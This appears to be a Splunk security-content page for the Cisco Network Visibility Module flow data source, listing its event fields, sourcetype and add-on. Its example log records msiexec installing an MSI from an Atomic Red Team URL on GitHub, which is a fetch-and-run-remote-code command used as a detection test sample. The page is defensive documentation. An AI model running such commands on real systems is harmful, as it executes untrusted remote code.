<span class="pill kill-chain">action</span>
<span class="pill kill-chain">aditional_logged_in_user_list</span>
<span class="pill kill-chain">aliul</span>
<span class="pill kill-chain">bytes</span>
<span class="pill kill-chain">bytes_in</span>
<span class="pill kill-chain">bytes_out</span>
<span class="pill kill-chain">da</span>
<span class="pill kill-chain">date_hour</span>
<span class="pill kill-chain">date_mday</span>
<span class="pill kill-chain">date_minute</span>
<span class="pill kill-chain">date_month</span>
<span class="pill kill-chain">date_second</span>
<span class="pill kill-chain">date_wday</span>
<span class="pill kill-chain">date_year</span>
<span class="pill kill-chain">date_zone</span>
<span class="pill kill-chain">deserialize</span>
<span class="pill kill-chain">dest</span>
<span class="pill kill-chain">dest_hostname</span>
<span class="pill kill-chain">dest_ip</span>
<span class="pill kill-chain">dest_ipv6</span>
<span class="pill kill-chain">dest_port</span>
<span class="pill kill-chain">dh</span>
<span class="pill kill-chain">direction</span>
<span class="pill kill-chain">dp</span>
<span class="pill kill-chain">dps</span>
<span class="pill kill-chain">ds</span>
<span class="pill kill-chain">eventtype</span>
<span class="pill kill-chain">fd</span>
<span class="pill kill-chain">fems</span>
<span class="pill kill-chain">fes</span>
<span class="pill kill-chain">fet</span>
<span class="pill kill-chain">field</span>
<span class="pill kill-chain">flow_dns_suffix</span>
<span class="pill kill-chain">flow_end_msec</span>
<span class="pill kill-chain">flow_end_sec</span>
<span class="pill kill-chain">flow_end_time</span>
<span class="pill kill-chain">flow_report_stage</span>
<span class="pill kill-chain">flow_start_msec</span>
<span class="pill kill-chain">flow_start_sec</span>
<span class="pill kill-chain">flow_start_time</span>
<span class="pill kill-chain">flow_version</span>
<span class="pill kill-chain">fsg</span>
<span class="pill kill-chain">fsms</span>
<span class="pill kill-chain">fss</span>
<span class="pill kill-chain">fst</span>
<span class="pill kill-chain">fv</span>
<span class="pill kill-chain">hh</span>
<span class="pill kill-chain">hm</span>
<span class="pill kill-chain">host</span>
<span class="pill kill-chain">ht</span>
<span class="pill kill-chain">http_host</span>
<span class="pill kill-chain">http_method</span>
<span class="pill kill-chain">ibc</span>
<span class="pill kill-chain">iid</span>
<span class="pill kill-chain">index</span>
<span class="pill kill-chain">linecount</span>
<span class="pill kill-chain">liuat</span>
<span class="pill kill-chain">liuid</span>
<span class="pill kill-chain">liuida</span>
<span class="pill kill-chain">liuidp</span>
<span class="pill kill-chain">logged_in_user</span>
<span class="pill kill-chain">logged_in_user_account_type</span>
<span class="pill kill-chain">logged_in_user_authority</span>
<span class="pill kill-chain">logged_in_user_principal</span>
<span class="pill kill-chain">mhl</span>
<span class="pill kill-chain">mnl</span>
<span class="pill kill-chain">module_hash_list</span>
<span class="pill kill-chain">module_name_list</span>
<span class="pill kill-chain">obc</span>
<span class="pill kill-chain">pa</span>
<span class="pill kill-chain">paa</span>
<span class="pill kill-chain">pap</span>
<span class="pill kill-chain">parent_process</span>
<span class="pill kill-chain">parent_process_account</span>
<span class="pill kill-chain">parent_process_arguments</span>
<span class="pill kill-chain">parent_process_hash</span>
<span class="pill kill-chain">parent_process_id</span>
<span class="pill kill-chain">parent_process_integrity_level</span>
<span class="pill kill-chain">parent_process_name</span>
<span class="pill kill-chain">parent_process_path</span>
<span class="pill kill-chain">parent_process_user_account_type</span>
<span class="pill kill-chain">parg</span>
<span class="pill kill-chain">ph</span>
<span class="pill kill-chain">pid</span>
<span class="pill kill-chain">pil</span>
<span class="pill kill-chain">pn</span>
<span class="pill kill-chain">ppa</span>
<span class="pill kill-chain">pparg</span>
<span class="pill kill-chain">ppath</span>
<span class="pill kill-chain">pph</span>
<span class="pill kill-chain">ppid</span>
<span class="pill kill-chain">ppil</span>
<span class="pill kill-chain">ppn</span>
<span class="pill kill-chain">pppath</span>
<span class="pill kill-chain">ppuat</span>
<span class="pill kill-chain">pr</span>
<span class="pill kill-chain">process</span>
<span class="pill kill-chain">process_account_authority</span>
<span class="pill kill-chain">process_account_principal</span>
<span class="pill kill-chain">process_arguments</span>
<span class="pill kill-chain">process_guid</span>
<span class="pill kill-chain">process_hash</span>
<span class="pill kill-chain">process_id</span>
<span class="pill kill-chain">process_integrity_level</span>
<span class="pill kill-chain">process_name</span>
<span class="pill kill-chain">process_path</span>
<span class="pill kill-chain">process_user_account_type</span>
<span class="pill kill-chain">protocol_identifier</span>
<span class="pill kill-chain">puat</span>
<span class="pill kill-chain">puid</span>
<span class="pill kill-chain">punct</span>
<span class="pill kill-chain">sa</span>
<span class="pill kill-chain">source</span>
<span class="pill kill-chain">sourcetype</span>
<span class="pill kill-chain">sp</span>
<span class="pill kill-chain">splunk_server</span>
<span class="pill kill-chain">splunk_server_group</span>
<span class="pill kill-chain">sps</span>
<span class="pill kill-chain">src</span>
<span class="pill kill-chain">src_interface</span>
<span class="pill kill-chain">src_ip</span>
<span class="pill kill-chain">src_ipv6</span>
<span class="pill kill-chain">src_port</span>
<span class="pill kill-chain">tag</span>
<span class="pill kill-chain">tag::action</span>
<span class="pill kill-chain">tag::eventtype</span>
<span class="pill kill-chain">timeendpos</span>
<span class="pill kill-chain">timestamp</span>
<span class="pill kill-chain">timestartpos</span>
<span class="pill kill-chain">transport</span>
<span class="pill kill-chain">udid</span>
<span class="pill kill-chain">uri_path</span>
<span class="pill kill-chain">user</span>
</div>
Data Source: Cisco Network Visibility Module Flow Data
Description
Data source object for Netflow events from Cisco Network Visibility Module
Details
| Property | Value |
|---|---|
| Source | not_applicable |
| Sourcetype | cisco:nvm:flowdata |
Related Detections
Supported Apps
- Cisco NVM Add-on for Splunk (version 4.0.7)
Event Fields
Fields
Example Log
1Jun 26 16:09:18 127.0.0.1 Jun 26 16:09:18 ip-172-31-30-201 fv="nvzFlow_v9" pr="6" sa="172.16.3.110" sp="5203" da="140.82.112.3" dp="443" fd="1" fss="1750954134" fst="Thu Jun 26 16:08:54 2025" fes="1750954134" fet="Thu Jun 26 16:08:54 2025" hh="'" hm="'" ht="'" udid="10E8A7F940225180BFDB748D2AE336EA7285CB8C" liuid="EC2AMAZ-E56LIG5\Administrator" liuida="EC2AMAZ-E56LIG5" liuidp="Administrator" liuat="2" pa="EC2AMAZ-E56LIG5\Administrator" paa="EC2AMAZ-E56LIG5" pap="Administrator" puat="8194" pn="msiexec.exe" ph="23EC37A4DF21893A1B3B6F5F72B2D78918E86C3A90F9664F8248A2C8219F889A" ppa="EC2AMAZ-E56LIG5\Administrator" ppuat="8194" ppn="cmd.exe" pph="41871DADE953D9F40F4AA445FC19982AB59D263C8AA93D7F67A1451663A09A57" ibc="0" obc="0" ds="us-east-2.compute.internal" dh="github.com" iid="4" mnl="'" mhl="'" fsms="1750954134331" fems="1750954134340" pid="8496" ppath="C:\Windows\system32\msiexec.exe" parg=" /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"" ppid="9232" pppath="C:\Windows\system32\cmd.exe" aliul="'" pil="12288" ppil="12288" fsg="1" puid="071161F29663831BB4A1C0FADA9805E0"
Required Output Fields
- dest
Source: GitHub | Version: 2